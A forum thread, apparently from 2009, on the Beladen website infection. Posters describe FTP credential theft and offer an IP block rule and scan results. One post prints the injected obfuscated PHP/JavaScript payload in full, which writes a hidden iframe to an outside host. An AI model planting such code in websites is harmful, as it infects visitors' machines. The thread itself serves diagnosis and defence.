[dylan4]

More than 40,000 websites have fallen victim to a virus attack that is still growing, security experts have said.

Security firm Websense says the site beladen.net is infecting legitimate websites all over the world with malicious code that then tries to install malware on the computers of people visiting them.

The Beladen virus is still active, with the number of affected sites growing from 20,000 to over 40,000 since Friday.

Carl Leonard, security research manager for EMEA at Websense, said the Beladen virus poses a "pretty serious" threat to users.

"We are trying to look into how these sites are compromised in the first place," he said. Anti-virus detection capability is also not that high, with 13 out of 40 systems tested by Websense failing to detect the malware.

	http://www.computerweekly.com/Articles/2009/06/03/236279/over-40000-sites-infected-by-growing-beladen-virus.htm

I had one client that was infected with this virus. Apparently it logs FTP information, then tries to login via FTP, once logged in the virus adds malicious code to all index.* files and then spreads itself to visitors of the victims website.

Here is the Malicious code the virus embeds into the files:

	<?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>'; ?>

Whenever someone visits an infected website it will prompt them to download a malicious PDF document, and if Adobe Reader is installed it will exploit Adobe reader and install trojans on the victims system.

There have been numerous reports on both the DirectAdmin and cPanel forums.

	http://www.directadmin.com/forum/showthread.php?p=157823 http://forums.cpanel.net/general/62821-iframe-javascript-hacks-35.html

We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session since ftp in a cleartext protocol. The virus would either then "phone home" or fire up it's own ftp connection and dl all .htm, .html and .php files from the user's account, add it's iframe or js code and reupload.

Just changing the ftp password makes no difference since the new password it compromised the very next time they make a connection (usually to fix their pages).

The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.

	http://www.directadmin.com/forum/showpost.php?p=158146&postcount=22

The IP that is reponsible for adding the malicious code.


91.212.65.147

	http://whois.domaintools.com/91.212.65.0

If you're running a windows machine I recommend you uninstall Adobe PDF Reader, and install Avira Premium Security Suite as it detects and prevents this virus .

	http://www.avira.com/en/downloads/avira_premium_security_suite.html

If you're a webmaster, webhost, or internet user. I recommend blocking this IP range with your firewall.


91.212.65.0/24IP Tables:


iptables -I INPUT -s 91.212.65.0/24 -j DROPAn easy way to see if your website has been infected, would be to download a backup of your files and scan the backup archive with Avira Premium Security Suite.

	--> ./tmp/webalizerftp/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./tmp/webalizer/domain.com/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./tmp/webalizer/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./tmp/webalizer/domain.com/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./tmp/webalizer/domain.com/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/ips_kernel/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/converge_local/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/public/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/uploads/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/interface/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus --> ./public_html/sandbox/cache/index.html [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus

If you have been infected, then scan your computer for viruses, and change your passwords after your machine is virus free.